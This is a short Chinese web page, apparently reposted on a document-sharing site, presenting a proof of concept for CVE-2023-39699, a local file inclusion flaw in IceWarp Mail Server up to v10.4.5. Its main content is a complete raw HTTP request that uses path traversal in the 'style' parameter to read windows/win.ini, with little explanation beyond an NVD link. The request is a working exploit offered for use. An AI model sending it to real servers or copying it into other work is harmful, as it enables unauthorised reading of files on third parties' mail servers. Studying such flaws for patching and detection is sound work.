打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
爱思华宝邮件服务器本地文件包含漏洞复现 CVE-2023-39699
userphoto

2023.10.08 甘肃

关注

影响范围

IceWarp Mail Server ≤ v10.4.5

基本上只有国外的

 漏洞poc

GET /-.._._.--.._{任意值}/webmail/calendar/minimizer/index.php?style=..\..\..\..\..\..\..\..\windows/win.ini HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: use_cookies=1; PHPSESSID_LOGIN=b61f2f21ca48d115649e7594d4173876; sess_suffix=basic; lastLogin=cs%7Cpro; lastUsername=admin; PHPSESSID_BASIC=wm-64fed2591f1aa933833975Connection: close

 漏洞复现

参考 

https://nvd.nist.gov/vuln/detail/CVE-2023-39699
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
内含POC丨漏洞复现之S2-061(CVE-2020-17530)
CVE-2020-2555:Oracle Coherence 反序列化RCE复现
CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现
用 PHP 获得浏览器信息?
已复现 | Microsoft Word 远程代码执行漏洞(CVE-2023-21716)
php-fpm漏洞复现(CVE-2019-11043)
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服